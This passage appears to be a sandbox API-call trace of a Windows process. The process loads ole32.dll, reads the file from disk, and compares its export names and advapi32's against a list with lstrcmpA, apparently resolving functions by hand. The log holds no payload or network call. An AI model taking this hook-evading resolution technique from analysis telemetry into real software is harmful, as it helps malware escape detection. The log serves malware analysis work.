lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.286] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0116.287] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0116.287] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0116.288] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.289] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0116.290] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0116.291] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0116.291] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0116.291] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0116.291] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0116.291] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0116.291] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0117.202] GetProcessHeap () returned 0x460000 [0117.202] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cb2010 | out: hHeap=0x460000) returned 1 [0117.210] GetProcessHeap () returned 0x460000 [0117.210] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479150 [0117.210] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0117.210] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0117.211] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0117.211] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0117.211] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0117.211] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0117.211] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0117.211] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0117.211] GetProcessHeap () returned 0x460000 [0117.211] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x142d00) returned 0x4076040 [0117.215] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0117.215] ReadFile (in: hFile=0x140, lpBuffer=0x4076040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4076040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0117.242] CloseHandle (hObject=0x140) returned 1 [0117.242] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0117.242] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0117.243] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0117.243] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0117.243] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.243] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.243] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0117.243] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0117.243] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0117.243] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0117.244] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0117.244] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0117.418] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0117.419] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0117.419] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0117.419] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0117.419] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0117.419] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 